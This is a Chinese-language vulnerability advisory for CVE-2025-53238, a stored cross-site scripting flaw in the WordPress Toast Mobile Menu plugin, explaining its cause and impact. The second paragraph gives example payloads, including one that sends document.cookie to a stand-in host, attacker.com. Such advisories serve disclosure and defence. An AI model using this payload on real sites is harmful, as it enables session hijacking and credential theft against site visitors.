CVE-2025-53238CVE-2025-53238是WordPress Toast Mobile Menu插件中的一个高危存储型跨站脚本(XSS)漏洞。该漏洞由于插件在Web页面生成过程中未对用户输入进行适当的过滤和转义处理,导致攻击者可以在移动菜单配置中注入恶意JavaScript代码。这些恶意代码会被永久存储在数据库中,当其他用户访问包含该菜单的页面时,恶意脚本会自动执行,可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全问题。攻击者利用此漏洞无需任何特殊权限即可实施攻击,但需要诱导管理员或用户访问包含恶意代码的页面。由于该漏洞影响WordPress插件的所有版本(<= 1.0.8),且在野外可能被利用,建议所有使用该插件的用户立即采取修复措施。
该存储型XSS漏洞存在于Toast Mobile Menu插件的菜单配置输入处理逻辑中。漏洞产生的根本原因在于插件开发者未遵循安全的输入处理原则,在将用户提交的菜单项数据(如菜单名称、链接文本等)存储到数据库时,未进行充分的输入验证和输出编码。当这些未经过滤的数据被重新读取并嵌入到网页HTML中时,攻击者注入的恶意脚本标签(如<script>、<img src=x onerror=...>、<svg onload=...>等)将被浏览器解析执行。具体利用方式为:攻击者通过WordPress后台或插件提供的配置接口,在菜单名称或URL字段中插入包含XSS payload的恶意代码,例如:'><script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>。由于这些数据在页面加载时会被动态渲染,恶意脚本将在任何访问该页面的用户浏览器中执行,窃取认证凭证、会话令牌或其他敏感信息。